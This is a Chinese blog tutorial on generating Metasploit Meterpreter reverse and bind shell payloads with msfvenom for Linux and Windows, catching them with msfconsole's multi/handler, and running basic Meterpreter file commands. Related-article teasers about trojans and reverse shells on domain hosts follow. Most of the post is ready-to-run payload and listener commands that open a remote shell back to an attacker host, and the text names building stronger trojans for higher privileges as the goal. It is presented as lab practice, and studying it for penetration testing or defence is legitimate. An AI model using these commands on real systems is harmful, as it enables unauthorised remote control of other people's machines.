kali linux中meterpreter使用前的反弹shell及其基础语法

最新推荐文章于 2024-07-09 11:38:25 发布
最新推荐文章于 2024-07-09 11:38:25 发布
阅读量8k 收藏 8
点赞数 2
分类专栏: kali

一.反弹shell的类型:

1.reverse_tcp  (基于TCP反向链接反弹shell)

1).在kali linux终端中,生成一个反弹shell

linux版:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=你kali本机的IP lport=随便选一个端口来接收信息 -f elf -o shell

如:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.168.240.119 lport=4444 --f elf -o shell

 windows版:

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.168.240.119 lport=4444 -f exe -o shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.168.240.119 lport=4444 -f raw -o shell.exe

2).生成shell后,将shell上传到相对应的靶机中,例如,linux版的上传到linux系统里,windows上传到windows系统中

前提是,靶机里的防火墙都要关闭,否则会被灭杀

3).在kali linux终端进入msfconsole界面

即运行以下命令:

msfconsole

use expolit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 172.168.240.119

set lport 4444
 
show options

exploit

4).返回windows中,点击运行shell,kali终端就会在4444端口连接到windows的meterpreter,记下来就进入到meterpreter命令行内,简单的一次shell反弹就成功了

2. bind_tcp (基于TCP正向连接的shell,适合在内网中使用,不用设置LHOST)

linux:

msfvenom -p linux/x86/meterpreter/bind_tcp lport=4444  -f elf -o shell
msfconsole

use exploit/multi/handler

set payload linux/x86/meterpreter/bind_tcp
 
set lport 4444

exploit


再打开一个终端
进入到shell所在的目录

ls

给shell一个运行的权限

chmod +x shell

ls
可以查看一下,可以发现shell的颜色变了,说明加权限=成功


找到shell,点击运行,在msfconsole里可以看到握手成功,直接进入到meterpreter命令内

 

 windows:

msfvenom -p windows/meterpreter/bind_tcp lport=4444  -f exe -o shell.exe

3.reverse_http  ( 基于http方式的反向连接,在网速慢的情况下不稳定)

windows:

msfvenom -p windows/meterpreter/reverse_http lport=4444  -f exe -o shell.exe

4.reverse_https   (基于https方式的反向连接,在网速慢的情况下不稳定, https如果反弹没有收到数据,可以将监听端口换成443试试)

windows:

msfvenom -p windows/meterpreter/reverse_https lport=4444  -f exe -o shell.exe

msfvenom的反弹shell进入到靶机里,最主要的不是对其电脑进行简单的操作,而是生成更高级的木马,来获取靶机更高级的权限

meterpreter中的一些操作(即将shell上传到本虚拟机里):

1.查看目录

     ls

查看其他目录,并监听

  ls  /root/Documents

2.文件上传

将桌面的文件上传到文档里

upload  /root/Desktop/a.txt   /root/Documents/

3.删除文件

rm  /root/Document/a.txt

 

 此文参考http://www.cnblogs.com/backlion/p/9484949.html

南人旧心1906
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用 metasploit 创建并反弹 shell
2301_78457119的博客
06-29 389
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。1 环境准备1.开启Kali虚拟机和bee-box靶机1.首先用 msfvenom 生成一个反弹 shell 的程序,将返回的连接地址修改为kali的 ip 地址。在 kali 打开终端,输入:当我们在服务器。
metasploit2 linux靶机反弹meterpreter shell
liweibin812的博客
07-07 717
Java RMI SERVER 命令执行漏洞 Java RMI Serve 的 RMI 注册表和 RMI 激活服务的默认配置存在安全漏洞,可被利用导致代码执行。 1.在kali执行msfconsole,启动metasploit 2.use exploit/multi/misc/java_rmi_server,选择漏洞 3.set RHOST 192.168.175.130 设置要攻击的机器IP 4.exploit,开始攻击 5.利用成功,得到 meterpreter shell注意:其他参数默认,不用.
【内网渗透】MSF渗透阶段的常用指令笔记
最新发布
uuzeray的博客
07-09 1387
不需要访问目标主机磁盘,所以也没什么入侵的痕迹。download nimeia.txt /root/Desktop/ # 下载文件到本机上如:download C:\boot.ini /root/或者download C:\"ProgramFiles"\Tencent\QQ\Users\295。run#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。
域环境里-反弹meterpreter
初学者L_言的博客
11-13 359
一、背景 1.1 提 域渗透 part1 域渗透 part2 假设在win7成功制作了 黄金票据,接下来则: 1、上传木马msf6.exe 到win2008 DC 上; 2、利用 schtasks 计划任务,执行木马 反弹shell; 3、也可以通过 sc 命令,创建服务 反弹 shell。 二、计划任务反弹shell 1、msf6.exe已经成功上传至 win7 上; 2、利用 TGT 伪造身份 将 msf6.exe 上传至 DC主机上; copy c:\msf6.exe \\WIN-USL
msfvenom使用方法
wutiangui的博客
04-25 121
我们使用metasploit的另一个后门工具msfvenom生成一个木马,方便我们测试meterpreter
reverse
计算机小白的博客
07-27 538
今天开始记录学习逆向的过程。。。 从http://reversing.kr/challenge.php的第一道题开始。 先放到OD,然后字符串检测: 应该就是Congration那一行,所以回车进入。 往上找,可以发现有很多判读语句,用来检测输入是否正确,若不正确则直接跳转到失败。 F9运行程序,然后输入123456789作为Password,F8单步执行,一步一步观察。 下
Kali Linux系统使用基础教程.pdf
11-29
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之写的...
Kali Linux系统使用基础教程.zip
06-28
Kali Linux系统使用基础教程.zip
kali Linux渗透基础知识.pdf
01-25
本文将详细介绍Kali Linux渗透基础知识的关键环节——信息收集。 信息收集是渗透测试的第一步,它涉及对目标系统进行情报分析、扫描探测、服务查点和漏洞搜索,甚至利用社会工程学技巧获取信息。这一过程旨在了解...
KaliLinux更改GRUB2背景的5种方式
02-25
这是一个关于如何在KaliLinux更改GRUB背景的简单指南(实际上它是KaliLinux的GRUB启动图像)。Kali开发团队在这方面做的不多,他们好像太忙了,所以在这篇文章,我会对GRUB解释一二,但是不会冗长到我失去写作的...
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9640
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
HTTP-Reverse-Shell:Python的HTTP反向Shell
05-22
HTTP反向外壳 这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 建立连接 贡献者
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2406
windows payload 反弹shell
Kali常见攻击手段_kali攻击
分享Python知识
11-17 3937
Kali常见攻击手段_kali攻击
msfvenom基本使用
weixin_53440207的博客
02-24 296
msfvenom具体使用教程
msf生成linux elf木马反弹shell
shatianyzg的博客
06-13 1556
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
渗透攻防工具篇-后渗透阶段的Meterpreter
qdslg的专栏
07-29 4320
文章作者  zusheng 文章来源  i春秋原创奖励计划 时间        2016年8月23日 14:38:43 言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter 1.1、什么是Meterpret...
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3888
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   MeterpreterMetasploit 框架的一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值